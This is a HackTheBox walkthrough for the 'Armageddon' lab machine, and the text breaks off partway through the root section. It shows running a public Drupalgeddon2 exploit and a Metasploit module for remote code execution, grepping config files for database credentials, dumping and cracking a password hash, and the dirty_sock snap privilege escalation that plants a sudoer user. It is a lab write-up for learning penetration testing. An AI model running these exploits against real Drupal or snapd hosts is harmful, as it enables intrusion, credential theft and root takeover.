HackTheBox: (“Armageddon”) — Walkthrough

5 min readJul 24, 2021

Hi People :D

Today we gonna solve “Armageddon” machine from HackTheBox, an easy machine that focuses on Drupal exploitation and snap privilege escalation, let’s get started :D

Enumeration

— — — — — —

Start with Nmap

nmap -A 10.10.10.233

We have two open ports (22/80) and we know from the results that the website on port 80 running Drupal 7, so let’s navigate to it

Web Enumeration
— — — — — — — —

We have a simple register&login function but we can’t create a new account because the e-mail cannot be sent as the website says: “Unable to send e-mail …”

Let’s move to the next step.. fuzzing directories.

We have a lot of files but /profiles/testing/testing.info is the most important one ( I used the Dirsearch tool to perform the fuzzing process )

./dirsearch -u http://10.10.10.233/ -e "*" -i 200

In the testing.info file, we have the exact version of Drupal (“7.56”) and now we can make sure that the website running Drupal 7.56

Drupal is a free and open-source web content management framework written in PHP ( more information Here ).

Let’s search for exploitation, I found This GitHub Repo that contains an automatic exploitation script

Exploitation
— — — — — —

Let’s download this repo using:

git clone https://github.com/dreadlocked/Drupalgeddon2.gitcd Drupalgeddon2/

Then run the script using:

./drupalgeddon2.rb http://10.10.10.233/

And we easily got an apache user shell ☺

OR you can use This Metasploit Module

First use the module then set the options for it:

use exploit/unix/webapp/drupal_drupalgeddon2set RHOSTS 10.10.10.223set LHOST tun0

exploit

We got an apache user shell from Metasploit successfully ☺

User Flag
— — — — —

After you get the apache shell, move to /var/www/html/sites/default directory, there are two PHP scripts that have a drupaluser credentials ( drupaluser:CQHEy@9M*m23gBVj )

You can grep for these creds using:

cat * | grep username && cat * | grep password

These creds work with MySQL database, so let’s try to find any passwords or hashes.

First, login to MySQL service using:

mysql -u drupaluser -h localhost -p CQHEy@9M*m23gBVj

Then list all databases using:

SHOW DATABASES;
show;

Second, use the drupal database with use drupal;, then list all tables using:

SHOW TABLES;
show;

We have a users table which probably contains the user's hashes

The last step is to dumb the users table contains using:

select * from users;
show;

There’s the brucetherealadmin hash in the users table ( $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt )

Let’s try to crack this hash, first put the hash into a file called hash then use the john tool with rockyou wordlist to start the cracking process

Wait for the tool to finish the cracking process then execute john hash --show to see the result.

The hash successfully cracked and the password is booboo

We can now SSH into brucetherealadmin using:

ssh brucetherealadmin@10.10.10.233 
pass: booboo

And we finally found the user flag ☺

Root Flag

— — — — —

Execute sudo-l command, you’ll see that you can run snap install as root without password and the machine is running snap 2.47.1–1.el7

After some searching, I found This GitHub Repo that talks about exploiting privilege escalation using snap by installing an empty devmode snap that adds a new user to the local system, this user will have permissions to execute sudo commands

We gonna use only the trojan part from dirty_sockv2.py.

But before we use it, we must know what it does first, right? It’s encoded by Base64 so let’s decode It

It’s adding a new user called dirty_sock with his hash using useradd and makes it one of the Sudoers by using usermod and gives him full permission with the echo command, the rest of the data is required for the snap package.

Now let’s copy this trojan and remove all spaces from it then put it into a file called exp.snap after decoding it using python and piping as following: